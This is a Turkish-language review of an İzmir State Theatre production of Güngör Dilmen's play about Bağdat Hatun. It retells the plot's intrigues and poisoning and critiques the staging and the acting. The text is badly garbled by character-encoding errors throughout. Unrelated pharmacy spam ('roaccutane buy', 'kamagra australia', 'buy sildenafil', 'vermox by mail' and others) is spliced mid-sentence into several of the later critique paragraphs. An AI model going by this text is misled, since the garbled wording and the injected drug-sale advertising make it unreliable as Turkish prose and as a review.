gA?venmekte aAYA�rA�ya gitmemelidir. KA�AYkA�rtA�r. AmacA�, Emir A�obana��a saldA�rtmaktA�r. Onun A?lkeyi oAYullarA� arasA�nda pay ettiAYini sA�yler. A�simleri her bir ilin ismidir. OAYullarA� A�nemli mevkilerdedir. A?lke gelirleri de A�obanlara��A�n elindedir. Bir hakan, parayA� kendi elinin altA�nda bulundurmalA�dA�ra�� Togay, iyi akA�l hocalA�AYA� yapmaktadA�ra�� Kestirmeden gider: BaAYdat Hatun ile BahadA�r arasA�nda A�obanlar tek engeldir. Engeller kalkmalA�.

A�A�A�A�A�A� Kam gelir. A�evreyi BahadA�ra��a uzatA�r. Bu uzatA�AY, BahadA�ra��A�n tekrar BaAYdat Hatuna��a yA�nelmesini saAYlar. YA?zA?nde delice bir pA�rA�ltA� oluAYur. Yeni bir durum. A�obanlara A�lA?ma�� Togay, istediAYine ulaAYmA�AYtA�r. Kam da A�ylea�� Burada Kama��a dikkat. BahadA�r Hana��A�n huzurunda, ne kadar rahat. BahadA�ra��dan da gA?A�lA? sanki. BA?yA?k iAY baAYarmA�AY gibia�� Hayatlarla oynuyora�� Korkusuza��

Togay, telaAYlanA�r. Bu birden olmaz. A�obanlara��A� bA�lA?p avlamak en doAYrusudur. YA�neliAYte yeni bir durum.

SavaAY hazA�rlA�AYA� baAYlar. Bu bir iA� savaAYtA�r. Demesk, yok edilmiAYtir. BahadA�r ile Togay, Horasan A?stA?ne yA?rA?mektedir. BaAYdat Hatun, babasA�nA�n yanA�nda olanlardan SevinA� Noyana��a savaAYA� A�nlemek adA�na hile yapmayA� A�nerir. Gece yarA�sA� hakanA�n ordusuna katA�lmasA�nA� ister. SevinA�, bA?yA?k bir yA?kten kurtulmanA�n sevincini yaAYar. Herhalde BaAYdat, kardeAYlerinin, babasA�nA�n kA�tA?lA?AYA?nA? istemeza�� A�yle bir ister kia��

A�A�A�A�A�A� BA?tA?n A�obangiller A�ldA?rA?lA?r. BaAYdat Hatun, kardeAYsiz kalA�ra�� Cellat da Emir A�obana��A� halleder. ArtA�k, BaAYdata��A�n A�lhanlA� tacA�nA� giymesi iA�in A�nA?nde engel kalmamA�AYtA�r. Yeni bir durum ve atA�lan dA?AYA?m. BaAYdat, kardeAYlerinin bA?yA? buAYurcuklarA�yla baAY baAYa kalA�r.

BaAYdat, saraydadA�r. Azeyh Hasan, terk edilen koca olarak ortada kalmA�AYtA�r. Kaderini bekler. BahadA�r onu A�sfahan EmirliAYine verir. Togay, hinoAYlu hin, bir AYeref daha verelim ona, der. Nikahta imamlA�AYA� ona yaptA�ralA�m. Azeytan! Adam zaten bitip tA?kenmiAY! Bu durumla yeni bir dA?AYA?m daha atA�lA�r. Acaba Azeyh Hasan ne yapacak? Kendisini aAYaAYA�latan bu durumu kabullenecek mi? KarA�sA�nA� boAYayA�p, BahadA�r ile evlendirecek mi?

A�A�A�A�A� DA?AYA?n tA�renia�� Gelinlik iA�inde BaAYdata�� Hasan, BahadA�r ile BaAYdat arasA�ndaa�� Togay, Arpa, Noyanlar, SevinA�a�� Hasan, kendi yA?zA?AYA?nA? A�A�karA�p atar. NikahlarA�nA� kA�yA�p onlarA� karA� koca ilan edera�� BaAYdat tacA� giyera�� Emeline ulaAYmA�AYtA�r. Ece olarak ilk buyruAYunu verir. ArtA�k, BahadA�ra��A�n tA?m haklarA�na o da sahiptir. Herkes A�A�kar, Hasan tek kalA�ra�� Yedi kaynA�nA�n savunduAYu namusunu o, teslim etmiAYtir. Togay, gelira�� Birazdan seviAYecek olan BahadA�r ile BaAYdata��A�n nasA�l seviAYeceklerini anlatarak Hasana��A� A�A�ldA�rtma noktasA�na getirir. Onu, iA�eri girip BahadA�ra��A� halletmesi iA�in kA�AYkA�rtA�r. A�Kendini aAYaAYA�lar, Hasan. HanA�eri bA�AYrA?ne saplar. Son nefesini verirken Togaya��A�n kahkahasA� kulaklarA�nda A�A�nlar. Yeni bir durum. (Nefis bir ikili sahne. A�yi de oynanA�yor. Hasan, yok oluAYu, yok oluAYun sevimsizliAYini iyi veriyor. A�A�ldA�rtan adam kimliAYinde Evren Serter, baAYarA�nA�n doruAYuna doAYru yA?kseliAYe geA�iyor.)

BaAYdat Hatun, artA�k Erlik Hana��dan kurtulmak ister. PiAYmanlA�k mA� yoksa onunla iAYi kalmadA�AYA� iA�in mi? Kam, girer, ondan boAYuna uAYraAYmamasA�nA�, Erlik Hana��a iAY gA�rdA?renin, onunla iAY birliAYi yapanA�n bir daha kolay kolay ondan yakasA�nA� kurtaramayacaAYA�nA� sA�yler. Kama��A� kovalara�� O, yalnA�zca halkA�nA�n iyiliAYini isteyen bir ece olmak istemektedira�� Bu istek, gA?nahlarA�ndan arA�nmanA�n bir yolu mu?

A�A�A�A�A� Ecea��nin halkla ilgilenmesi Togaya��A� rahatsA�z eder. Yeni bir durum ve dA?AYA?m noktasA�. Halk, A�obanlara��A�n kA?tillerine lA?netler yaAYdA�rmaktadA�r. HalkA�n kendilerine sataAYacak olmasA�ndan dolayA� Togay korkmaktadA�r. BahadA�r rahattA�r. O, Cengiz yasalarA� aracA�lA�AYA�yla kendisini korumaya almA�AYtA�r. Der ki: a�?Ben, hakan olarak eylerimde sorumsuzum, gA?ven verici bir durum. Ne gA?zel dA?AYA?nmA?AY Cengiz Han. A�yi bir iAY yapA�lmA�AYsa AYeref benim. KA�tA? bir iAY A�A�kmA�AYsa elimden, danA�AYmanlarA�mA�n. Beni yanA�ltmA�AY demektir. Ben, suA� iAYlemiyorum Cengiz yasalarA�na gA�re. KurbanlarA�mA�n kanA� akA�p gidiyor bana bulaAYmadan.a�? Ece girince BahadA�r sorar: a�?Horasan EmirliAYia��ne kimin atanmasA� uygundur sizce?a�?BaAYdat, a�?SayA�n Togaya��a dA?AYer Horasan EmirliAYia�? der hemena�� Togaya��A�, kendisi iA�in tehlikeli olacak adamA� yanA�ndan uzaklaAYtA�rmak ister kurnaza�� Togaya��A�n bu iAYine gelmez. GA�lge adam olarak memleketi yA�netendir oa�� uzaklaAYA�rsa, bu mutluluktan mahrum kalacaktA�r. BaAYkomutan da olura�� Bu baAYA�AYlar, onu kaygA�landA�rA�r.

Bu ara papa evliliklerini kutlar. OnlarA� HA�ristiyanlA�AYa davet eder. BaAYdat, bu davete bozulur. Papaa��ya Erlik Hana��a tapmasA� iA�in mesaj yollara�� MA?ftA?, fetva verir. BaAYta Ece olmak A?zere tA?m kadA�nlar dinin gereklerine gA�re A�arAYafa bA?rA?nmelerini, yA?zlerini peA�e ile A�rtmelerini ister. Ece, buna da tepki gA�sterir. MA?ftA?nA?n A�arAYafa bA?rA?nA?p peA�e takmasA� yA�nA?nde emir verir. YA?rekteki kA�tA?lA?k peA�eyle gizlenemez A�A?nkA?. PeA�e takan Ece, bundan bA�yle hiA� kA�tA?lA?k yapmayacak mA�? KA�tA?lA?klerinin arkasA� kesilecek mi?

BaAYdat hatun, tarihA�i A�brahima��den MoAYola��un altA�n A�aAYA�nA�, yani BaAYdat Hatun A�aAYA�nA� yazmasA�nA� ister. A�brahim, AYaAYA�rA�r. BaAYdata��la biA�imlenecektir A�aAY. HalkA�na kol kanat gerdiAYini, aA� A�A�plak koymadA�AYA�nA�, bilginleri koruduAYunu, ozanlarA� yA?reklendirdiAYini, barA�AYA� saAYladA�AYA�nA� sA�yler. A�brahima��den, tA?m bunlardan bahsetmesini, minyatA?rlerle sA?slemesini ister. BaAYdat hatun, sA?rekli istemektedir. A�stekleri arasA�nda Emir SevinA�a��in A�ldA?rA?lmesi, GA?nahlarA�ndan arA�nA�ncaya kadar BahadA�ra��A�n kendisinden uzak durmasA�nA�a�� BahadA�ra��A�n sevgisi A?stA?ne ant iA�mesinia�� DilAYada��a da onu gA?nahlA� yaAYamdan uzak tutmak iA�in sA�z verira�� Bu isteklerle durum A?stA?ne durum yaratA�lA�ra��

A�A�A�A�A�A� Huzura gelen Togay, Emir SevinA�a��in niye idamA�nA�n istendiAYini sorar. Rey savaAYA�nda ihanet suA�undana�� Arpa da Emir SevinA� gibi davranmA�AYtA�ra�� O genA� olduAYu iA�in baAYA�AYlanmA�AYtA�ra�� Bu tercihler arasA�nda bir AYeyler aramak gerek. A�zellikle Arpaa��nA�n baAYA�AYlanmasA�ndaa�� Togay, olumsuz yA�nde BahadA�ra��A� etkilediAYi iA�in, suA�lar. Acaba kendisi hangi yA�nde etkiliyor?A�A� Togay, A�A�karken gA�zA?nA? DilAYada��dan alamaz. Bu hemen planlarA�ndan birini daha uygulamaya sokacaAYA�nA�n iAYaretidira�� Yeni bir duruma�� Togay, kaygA�lA�. BahadA�ra��A�n A?stA?ndeki etkisini yitirmeye baAYladA�AYA�nA�, Ecea��nin BahadA�ra��A� avucunun iA�ine aldA�AYA�nA� gA�rmA?AYtA?r. Ecea��yi BahadA�ra��dan uzaklaAYtA�rmak iA�in DilAYada��A� kullanacaktA�r. BahadA�ra��A�n yanA�na vardA�AYA�nda, BahadA�r elinde kapuz bir AYeyler tA�ngA�rdatmaya A�alA�AYmaktadA�r. Esin gelmediAYinden AYikA?yetA�idir. Togay hemen esin kaynaAYA�nA�zA� yenileyiniz, deyip DilAYada��A� BahadA�ra��A�n aklA�na sokar. Yeni bir durum ve dA?AYA?m noktasA�. Olacak iAY mi bu? DilAYad yeAYenidir ve ellerinde bA?yA?mA?AYtA?ra�� Togay A�srar eder ve aklA�nA� A�elera��

BahadA�r, BaAYdat Hatun ile baAY baAYa kaldA�AYA�nda sA�zA? DilAYada��a getirir. AralarA�na katA�lmasA�nA� istemektedir. BaAYdat karAYA� A�A�kara�� BahadA�r, Togaya��A� A�ver, BaAYdat, dA?zenbaz deyip kA�tA?lera�� Tahtta ve kendisinde gA�zA? olduAYunu sA�ylera�� BahadA�ra��A�n A�lmesi kim bilir onu ne kadar A�ok sevindirecektira�� BahadA�r, o sadA�k adamA�m benim iA�in canA�nA� verir, dera�� BaAYdat iA�in bunu sA�namak kolaydA�r. BahadA�ra a�?A�lA?mA?nden sonraki anlarA� yaAYatacaAYA�m sanaa�? dera�� Plan hazA�rlamA�AY, Togaya��a tuzak kurmuAYtur. Yeni bir durum ve dA?AYA?m noktasA�.

TarihA�i A�brahim de boAY durmamA�AY, istedikleri kitabA� hazA�rlayA�p getirmiAYtir. KitabA� bA�raktA�AYA� gibi toz olmuAYtur. SayfalarA� karA�AYtA�rA�rken birden yA?zA? deAYiAYir BaAYdata��A�n, A�fkelenir. A�brahim onlarA� yererek onlara oyun etmiAYtir. BahadA�ra��A� tutkularA�n tutsaAYA�, sorumsuz, aAYA�k bir yoz hakan olarak nitelemiAYtir. A�nce kA�zar,a�? vay alA�aka�?, der ama AYA�yle bir dA?AYA?nA?nce a�?yalan deAYila�? dera�� YalnA�z baAYA�na kalsa, Togay ve BaAYdata��tan etkilenmese yanlA�AY yapmaktan uzaklaAYacak doAYru olanA� bulacaktA�ra�� TarihA�i, BaAYdata��A� da kardeAYlerinin A�lA?mA?nden sorumlu tutmaktadA�r. YA�neldiAYi dinin kara olduAYunu, Erlik Hana��a inandA�AYA�nA� yazmA�AYtA�r. MinyatA?rlerle anlatmA�AYtA�r olan bitenia�� TarihA�i, BahadA�ra��A�n A�lA?mA?nA?n BaAYdata��A�n elinden olacaAYA�nA� gA�rA?ra�� TarihA�i sanki bir kA?hin. GeA�miAYte olan biteni A�ok iyi hatA�rladA�AYA� gibi geleceAYi de A�ok iyi gA�rA?r. A�nsanlarA� A�ok iyi tanA�dA�AYA�ndan mA� yoksa tarih tekerrA?r ettiAYinden mi? Togaya��A� ise BahadA�ra��A�n kapA�sA�nda A�anak yalayan bir kA�pek olarak A�izmiAYtira�� TarihA�i, bA�yle yaparak onlarA� halkA�n gA�zA?nde deAYil birbirlerinin gA�zA?nde kA?A�A?k dA?AYA?rmA?AYtA?r.

A�A�A�A�A�A� BaAYdat, Togaya��a yakA�nlA�k gA�stermeye baAYlar. BahadA�ra��A� Oa��na karAYA� kA�AYkA�rtmaktan vazgeA�mesini, birlikte hareket etmelerini ister ve onu A�pmeye kalkar. Togay, irkilir. Biri gA�rmA?AY mA?dA?r? BaAYdat, Togaya��a kendisini sevince boAYacaAYA�nA� sA�ylera�� Yeni bir durum dA?AYA?m noktasA�a��

Kam, BahadA�ra��A�n balmumundan maskA�nA� yapara�� TA�patA�p BahadA�ra�� (DeAYil iAYte, oyunda kullanA�lanA�n BahadA�r ile ilgisi yok) BahadA�r maskA� gA�rA?nce irkilir. VA?cut ise bilinmez bir yurttaAYA�na�� Boyunun posunun BahadA�ra��a denk dA?AYmesi ise bu saatte sokaktan geA�mesia��

Plan uygulamaya konulura�� Kam ile BahadA�r gizlenir. BaAYdat, Togaya��A� iA�eri alA�r. Togay, kelleyi gA�rA?nce yA�ldA�rA�m A�arpmA�AYa dA�ner. Cinayet, der, nA�betA�ilere seslenir. BaAYdat a�?sevineceAYini sanmA�AYtA�ma�? deyince Togay, bu laf A?zerine AYaAYkA�nlA�AYA�nA� A?stA?nden atA�p gA?lmeye A�ve iA�indeki nefreti kusmaya baAYlara�� BahadA�r ile aralarA�ndaki aAYA�lmaz uA�urum ters yA?z olmuAYtur. Sabah A�nA?nde titriyordu, AYimdi ayaklarA�nA�n dibinde bir leAYa�� Bu ne gA?zel bir bayram! Sevinci uzun sA?rmez.A� BahadA�r birden ortaya A�A�kA�nca dili tutulur, yere dA?AYer, sA?rA?nA?r. BahadA�r, A?stA?ne A?stA?ne gider. Togay deAYil mi yaAYam bir oyundur diyen? Oa��na seyirlik bir oyun sunmuAYtur. YA?zA?ndeki maskeyi erken indirmiAYtir usta oyuncu. Yeni bir durum ve dA?AYA?m noktasA�. BaAYdat, diri diri A�engellere asA�lmasA�nA� ister Togaya��A�n. LeAY kurtlarA�na AYA�len olmalA�dA�r bedenia�� Millet seyretmeli Togaya��A�n kiminle gerdeAYe girdiAYinia�� Tuzak baAYarA�yla uygulanmA�AYtA�r. BahadA�r, bA�ylece BaAYdata��A�n dileAYini yerine getirmiAYtir. Azimdi sA�ra onun dileAYinin yerine getirilmesindedir. DilAYad hazA�rlanmalA�a�� Yeni bir durum ve dA?AYA?m noktasA�.

SA�ra dA?AYA?ne gelmiAYtir. DilAYada��dan, BahadA�ra��a A�ocuk vermemesini ister, BaAYdat. Bir ilaA� uzatA�r, rahmini daAYlamasA�nA� ister. BahadA�r ile son bulmalA� HA�lagu soyua�� DilAYad AYiAYeyi alA�r. BahadA�r Onu karAYA�lar, beraber A�A�karlara�� BaAYdat niye doAYurmaz? O cenini koparttA�AYA�ndan rahmi zedelenmiAYtir. KA�sA�r kalmA�AYtA�ra�� Birden sinirlenir. Madem kendi doAYuramA�yor, A�lhanlA� A?lkesindeki tA?m kadA�nlar doAYurmayacak dera�� Bu insanA�n yaradA�lA�AYA�na aykA�rA� bir buyruktur. BuyruAYunu geri almalA�dA�r. A?lkenin tA?m kadA�nlarA� tepki koyara�� Kendini dA?AYA?nen bir Ece! Hani halkA�nA�n yararA�na A�alA�AYacaktA�? KadA�nlarA�n direnmesi karAYA�sA�nda BaAYdat yenik dA?AYer, buyruAYunu geri alA�ra��

A�A�A�A�A�A� Kam, A?lkenin ticaretini eline geA�irmesini ister. KadA�n sanki Togaya��A�n yerine geA�miAYtir. Yeni bir durum ve dA?AYA?m noktasA�.

DanA�AYma kurulua�� BaAYdat Hatun, savaAYta barA�AYta gA?vencemizsiniz. KiAYisel A�A�karlarA�nA�zA� hiA�e sayA�p devlet uAYruna A�zveriyle A�alA�AYA�rsA�nA�z, diyerek, onlarA� pohpohlar. ToplanmalarA�nA�n amacA� onlarA�n kiAYisel sorunlarA�nA� A�A�zmek iA�indir. BahadA�r onlara gA?venmemektedir. BaAYdat, eski itibarlarA�nA� geri vereceAYini sA�yler. TopraklarA�nda A�alA�AYan kA�ylA?ler, efendilerini tanA�maz olmuAYlardA�r. Toprak reformunu ileri sA?rmektedirler. BaAY ayaAYa sA�z geA�irememektedir. KA�ylA?ler, kA�le deAYiliz demektedir. BaAYdat hatun, toprak reformunu kaldA�rA�r.

A�A�A�A�A�A� Noyanlardan sonra BitikA�iler ile konuAYur. Gelenlere A�pek Yolu ticaretini ele geA�irmek istediAYini sA�yler. Askerleri hem ipek yoluna koyacak hem onlarla tehditte bulunacak. YarA�AYta ileri giden baAYka bezirganlar hizaya getirilecektir. HaraA� vermeyen kervan bozulacaktA�r. Al TuAYu taAYA�yan kervana bir AYey olmaza�� Onlara al tuAY verira�� Onlara istedikleri kadar altA�n verecektir. BezirganlarA�n iAYi iAY!

A�A�A�A�A�A� ArtA�k zaman Arpaa��ya yakA�nlaAYma Oa��nu avucunun iA�ine alma zamanA�dA�r. Yeni bir durum ve dA?AYA?m noktasA�. Arpaa��ya umut verir. RA?yasA�nda gA?ya Ulu Cengiz Hana��A�n kA�lA�cA� Arpaa��nA�n elinde parlamA�AYtA�r. Arpa, BahadA�ra��A�n henA?z saAY olduAYunu sA�yler. CinselliAYini kullanA�r, Arpaa��nA�n yaklaAYmasA�na izin verir.

A�A�A�A�A�A� BaAYdat, Kama��dan, en sinsi zehirlerinden sA�z etmesini ister. AAYuyu BahadA�r Han iA�in istediAYini anlayA�nca, Kam korkar. BahadA�r da aAYulanmaktan korkmaktadA�r. Bu nedenle hep kuAYkuludur. BaAYdata��a bile gA?venmemektedir. Kendisine sunulan iA�kiyi A�nce bu nedenle BaAYdat yudumlamakta, sonra BahadA�r iA�mektedir. Kam, korkusunu bir yana atar, heybesindeki zehir dolu AYiAYeyi A�A�karA�r, BaAYdata��a verir. Yeni bir durum ve dA?AYA?m noktasA�.A� SeviAYme sonrasA� terleyen deride gA�zenekler iyice aA�A�lA�r. Bu sA�rada sA?rA?len zehir daha kolay yayA�lA�r. Zehiri havluya sA?recek, terini siler gibi yapA�p vA?cudunu ovalayacaktA�r. A�A�zbekler karAYA� sefere A�A�kacak olan BahadA�ra��a BaAYdat, gece beraber olma teklifini yapar. DilAYad ile BahadA�ra��A�n A�A�kmasA�nA� fA�rsat bilen BaAYdat, orada bekleyen noyanlara hemen sorar. a�?SavaAYta bir AYey olursa BahadA�ra��a yerine kim geA�er?a�?a��a�?Hakan saAYa�? derlera�� BaAYdat A�srar edince a�?kurultay seA�era�? derler. Cengiz HA?lagu soyundan bir dala�� Yeter ki, dA?rA?st, yetenekli bir noyan olarak gA�z doldursuna��a�?BA?tA?n bu vasA�flarA� Arpa A?stA?nde topluyora�? der BaAYdata�� Ya kendisi ne yapar? SA�rasA�nA� savmak iA�in kenara A�ekileceAYini sA�ylera�� BaAYdat, Arpaa��ya hazA�r ol, der, nA�beti devralmayaa�� Yeni bir durum ve dA?AYA?m noktasA�.

Kam, havluyu hazA�rlar, BaAYdata��a verir. BaAYdat, hamile olduAYunu sA�yler. Kam a�?bu durumda yine de havluyu sA?recek misin?a�? dera�� BahadA�ra��a baAYlA�a�� Yeni bir durum ve dA?AYA?m noktasA�.

SeviAYme sonrasA�a�� BahadA�r yorguna�� BaAYdata��A�n elinde havlua�� BaAYdat, BahadA�ra��dan DilAYada��A� boAYamasA�nA�, baAYkasA�yla evlendirmesini ister. BahadA�r a�?ayA�rA�rsa beni ondan anca A�lA?m ayA�rA�ra�? deyince BaAYdat, gA?nah benden gitti deyip havluyu sA?rer. Aka Lulua��nun neyi hafiften duyulmaya baAYlar. Bu, yaklaAYmakta olan A�lA?mA?n sesidir. Yeni bir durum dA?AYA?m noktasA�. BahadA�r can A�ekiAYirken Arpa gelir, BaAYdata��tan dairesine A�ekilmesini ister. a�?A�lA?rken yanA�nda yoktunuz, bir AYey bilmiyorsunuz. A�lA?yA? ilk ben gA�rdA?ma�?a�� Arpaa��nA�n BaAYdata��a karAYA� bir planA� mA� var acaba? Yeni bir durum ve dA?AYA?m noktasA�.

Kurultaya�� AralA�klA� kA�s vuruAYlarA�a�� Noyanlar birer ikiAYer gelir, A�oAYu kaygA�lA�a�� BaAYdat, Emir SevinA�a��i tersler. Bu kurultaya onu A�aAYA�rmadA�AYA�nA� sA�ylera�� A�aAYrA� gerekli deAYildir. Hakan A�lA?nce noyanlar kendiliAYinden gelira�� En kA�demli noyan olarak kurultayA� aA�ara�� BaAYdat, hakanlA�k iA�in tek adayA�n Arpa olduAYunu aA�A�klara�� Tek aday olamaz. Bu kurultayda hakan seA�imini anlamsA�z kA�lara�� Emir SevinA� de aday olura��

Arpa ile Ak Lulu girera�� Arpa, celladA� bA?yA?k suA� iAYlemiAY birini yasaya eriAYtirmek iA�in getirmiAYtir. SuA�lunun kim olduAYu aA�A�klamasA�nA� hakan seA�imi sonrasA� yapacaktA�r. O kiAYi AYimdi aralarA�ndadA�r. Elinde yadsA�namaz bir kanA�t vardA�r. Yeni bir durum ve son asal dA?AYA?m noktasA�.

SeA�imin aA�A�k oylamayla yapA�lmasA�nA� ister, BaAYdat. SA�nA�r A�tesi tehlikelerden sA�z eder ve Arpa ile evleneceAYini aA�A�klar. Kurultay A�oAYunluAYuyla Arpa hakan seA�ilira�� Arpa, suA�u ve suA�luyu aA�A�klar. BaAYdat Hatuna��dur bu kiAYi. Bu aA�A�klamayla Arpa han, hakanlA�k gA�revini yerine getirmiAYtir. BaAYdat, suA�lamayA� reddedince Arpa kanA�t olarak BahadA�ra��a yazdA�rdA�AYA� kA?AYA�dA� gA�sterir. Noyanlar yazA�yA� tanA�r. BahadA�ra��A�n el yazA�sA�dA�r bu. BaAYdat, Arpaa��yA� dA?zen kurmakla suA�lar. Arpa a�?sizin kurduAYunuz dA?zenden beter deAYila�? der.

A�A�A�A�A�A� Arpa iAYaret eder, Lulu BaAYdata��A�n baAYA�na tA?l atar, kemendi onun A?stA?nden baAYA�na geA�irir, sA�kar.

Oyunun dekoru sitilize bir dekor. EAYya yA�AYmaktan A�zellikle kaA�A�nA�lmA�AY. YA?kselti olarak dA?AYA?nA?len, seyirciye doAYru eAYim alan bir eAYik dA?zlemin A?stA?nde geA�iyor oyun. Oyunda farklA� mekA?nlar var. MekA?n deAYiAYimlerinde paravanlar kullanA�lmakta. Paravan A?stlerindeki semboller aracA�lA�AYA�yla da mekA?nA�n hangi mekA?n olduAYu belirlenmekte.

EAYik dA?zleme deAYinmek gerek. Yer beziyle kamufle edilmediAYi iA�in sunta oluAYu seyircinin gA�zA?ne gA�zA?ne sokuluyor. RahatsA�z edici bir durum.

Oyuncular kostA?mleri iA�inde kayboluyor. Hepsi pA�rA�l pA�rA�l, tiril tiril, tezgahtan yeni A�A�kmA�AY gibia�� Bu insanlar toz toprak yollarda, A�ayA�rlarda bayA�rlarda, daAYlarda, at sA?rA?yorlar, uzun mesafeler roaccuntane buy. kat ediyorlar. A?stleri baAYlarA� hiA� mi tozlanmaz, kirlenmez?

MA?zik, oyun boyunca alta fon olarak dA�AYenmiAY. Uzun indian pharmacies that accept paypal. boylu dinletilmesi oyunu izleyeni yoruyor.

YA�netmenin bu oyunda yaptA�AYA� en A�nemli iAY, oyuncularA� sahnede dengeli sA�ralayarak, yerleAYtirerek gA?zel fotoAYraflar elde etmesia�� Oyunda ritim gA?zel yakalanA�yor. A�zellikle giriAY sahnesi seyirciyi hemen yakalayA�p kavrA�yor, oyunun iA�ine A�ekiyor. YalnA�z, Kama��A�n yaptA�AYA� ayin sahnesi A?stA?ne fazla kafa yorulmamA�AY. Bir kere bu sahnenin yeri sahne A�nA? olmamalA�ydA�. SavaAY sahnesinde yapA�ldA�AYA� gibi arkaya alA�nmalA�ydA�. Ayinlerde bA?yA?k bir ateAYin olmasA�, Azamana��A�n davulu aracA�lA�AYA�yla bu ateAYle iliAYkiye girmesi A�ok A�nemlidir. Davul, AYamanA�n eyleminin her dA�neminde ona eAYlik eder. VazgeA�ilmezdir. Davulu ateAYin A?stA?nde gezdirir. A�aAYA�rdA�AYA� ruhlarA� davulun iA�ine doldurur. Yerin altA�na yaptA�AYA� yolculuAYun katlarA�nA� davulun vuruAYlarA�yla temsil eder. Davul, AYamanA�n vecd haline gelmesinde en bA?yA?k etkendir. Davuluna hA�zlA� hA�zlA� vurarak, gittikA�e hA�zlanan bir dans yaparak vecd hA?line gelir. Vecdin en yoAYun olduAYu anda yere dA?AYer, kA�mA�ldamadan kalA�r. YavaAY yavaAY uyanA�rken eliyle davuluna dokunur. Davuldan A�A�kan ses onun yaAYadA�AYA�nA� gA�sterira�� Ayin tA�reni iA�inde gizem barA�ndA�rA�r. Gizemli olan AYey insandan gizlenir. Gizlilik var olan merakA� A�oAYaltA�r. Bu sahnenin sahne A�nA?nden sahne arkasA�na alA�nmasA� bu nedenle A�nemlidir. IAYA�k ve tA?ller aracA�lA�yla eylem olaAYan olandan bA?yA?k gA�sterilebilir, seyirci A?stA?ndeki etki arttA�rA�labilir bA�ylecea�� Sahne A�nA?nde bir tA?tsA? kabA�yla yapA�lan ayin ayin olmaktan A�A�kA�yora�� YapA�lan dansta da iyi bir koreografi gerek, yerde bir saAYa bir sola yuvarlanmaktan A�tea��

GA?ngA�r Dilmena��de dil A�ok A�nemlidir. Antik dA�nem yazarlarA� ve Shakespeare Oa��nu derinden etkilemiAYtir. Bu nedenle AYiirselliAYi oyun yazA�mA�nda A�n plA?na koyar. A�mgelere yer verir. Bunun nedeni, on cA?mleyle sA�yleyeceAYini tek cA?mleyle sA�yleme isteAYinden gelir. AziirselliAYin ritminin yakalanmasA� gerekir. Oyuncular heceleri bile dA?AYA?nmeli tonlamalarA� ona gA�re yapmalA�dA�r. Oyunda bunu A�ncelikle Togaya��A� oynayan Evren Serter yakalamA�AY. Dile, vA?cut dilini de katarak duygularA�nA� aA�A�AYa A�ok iyi A�A�kartA�yor. Oa��nun hinoAYlu hin, dA?zenbaz, hileci bir kiAYiliAYe sahip olduAYunu hemen anlA�yoruz. YakaladA�AYA� tavA�r A�ok doAYrua�� Bu kulvarda Oa��nu veziri oynayan Arif Yavuz, Azeyh Hasana��A� oynayan A?mit Dikmen izliyor.

BaAYdat Hatuna��u oynayan Hande GA?ler, genelde tahta A�A�ktA�ktan sonra, yA?zA?nde bir mask oluAYturuyor. SA?rekli A�fke saA�an bir kadA�n olarak kamagra australia mastrcard. karAYA�mA�zda gA�rA?yoruz. DuruAYlarA�nda bu nedenle baAYA�nA� sA?rekli yukarA�ya kaldA�rA�yor. YA?zA?nden A�ok boynu ve A�enesi gA�ze A�arpA�yor. Bunda o eAYik dA?zlemli yA?kseltinin de payA� var muhakkak, seyircinin ,A�zellikle de A�n sA�ralarda oturanlarA�n A�ok altta kalmasA�ndan dolayA�a��

BahadA�r Hana��A� oynayan A�zkan Gezgin, A�zellikle Togaya��A�n yanA�nda kuzey A?lkelerinden gelmiAY bir mA?lteci Viking gibi kalA�yora�� SarA�AYA�na�� Soluk benizli. buy sildenafil, acquire lioresal. Bir A�lhanlA� gibi makyaj yapmalA�, saA�A�nA� siyaha boyamalA�, en azA�ndan bA�yA�klA� olmalA�ydA�. Spot A�AYA�klarA� yA?zA?ne vurunca benzi iyice soluklaAYA�yora�� TarihA�inin gA�nderdiAYi kitabA�n sayfalarA�nA� A�evirirken BaAYdat, o kadar geride olmasA�na ve BaAYdat, elindeki kitabA� baAYA�yla kapatmasA�na raAYmen yazA�lanlarA� rahatlA�kla okuyabiliyor. Ne gA�z ama! A�nsan yaklaAYA�r, sokulur. BaAYdat yabancA� deAYil. YabancA� olsa da fark etmez, nasA�lsa sen iAYine geldiAYi gibi Cengiz Han kurallarA�nA� uyguluyorsun, halkA�n iA�in deAYil kendin iA�ina��

BahadA�ra��A�n havluyla zehirlendiAYi sahneye gelincea�� SeviAYme sonrasA�, BahadA�r terliyken zehire bulanmA�AY havlu BahadA�ra��A�n bedenine sA?rA?lecek. A�zellikle seviAYme sonrasA�a�� SeviAYirken yalnA�z BahadA�r mA� terliyor? BaAYdat Hatun terlemiyor mu? Bir gA?zel, A�A�plak, terli elleriyle havluyu alA�yor, BahadA�ra��A�n vA?cuduna seriyor, ovalA�yora�� BahadA�ra��A� zehir hemen etkiliyor. HakkA�nA� yemeyelim, A�zkan Gezgin bu sahnede A�ok iyi. A�lA?me giden yolda vA?cudunu kullanmakta baAYarA�lA�. MaAYallah, zehir BaAYdat Hatuna��a bir AYey yapmA�yor. Neden acaba? Oyun icabA� mA�? Eskiden TA?rk filmlerinde mucize olur film icabA� kA�r kA�zA�n gA�zleri birden aA�A�lA�verirdi. Herhalde, burada da oyun icabA� BaAYdata��a bir AYey olmuyor. Belki de kendisinin zehir olmasA�ndan dolayA� havludaki zehir Oa��na bir AYey yapmA�yor. Zehir zehiri kovuyor.

KA�sa sA?re A�nce buy Tadalis SX Soft, dapoxetine reviews. yitirdiAYimiz GA?ngA�r Dilmena��i anmak adA�na bu oyunun sahnelenmesi A�nemli.

 

 

*Bu oyun A�zmir Devlet Tiyatrosu yapA�mA�dA�r.

Yazan: GA?ngA�r Dilmen, YA�neten: Bozkurt KuruA�, Dekor vermox by mail. TasarA�m: Melih Karakurt, Giysi TasarA�mA�: YA�ldA�z A�peklioAYlu, IAYA�k TasarA�mA�: Zeynel IAYA�k, Dramaturg: PA�nar Merterkek, YA�netmen YardA�mcA�sA�: Cemalettin A�ekmece-Dilek Demir.

Oyuncular: Hande GA?rler, Arif Yavuz, A�zkan Gezgin, A?mit Dikmen, Evren Serter, HA?lya SavaAY, NeAYe arat, Cemalettin A�ekmece, Recep AyyA�ldA�z, TA?rker Alpugan, YaAYmur GA�ren, A�mer Polat, A�lker Atatoprak, GerA�ek A�ner, Enis Tekerek, Elif GA�ksuner, A�zlem KamaloAYlu, Bengi Ebru Atakan, Ender Azeviker, A�mer Okatan.

 

**MeraklA�sA� iA�in AYamanlA�k A?stA?ne kitaplar:

ErhanA� Tuna, a�?AzamanlA�k ve Oyunculuka�?, Okyanus YayA�nevi, A�stanbul, 2000

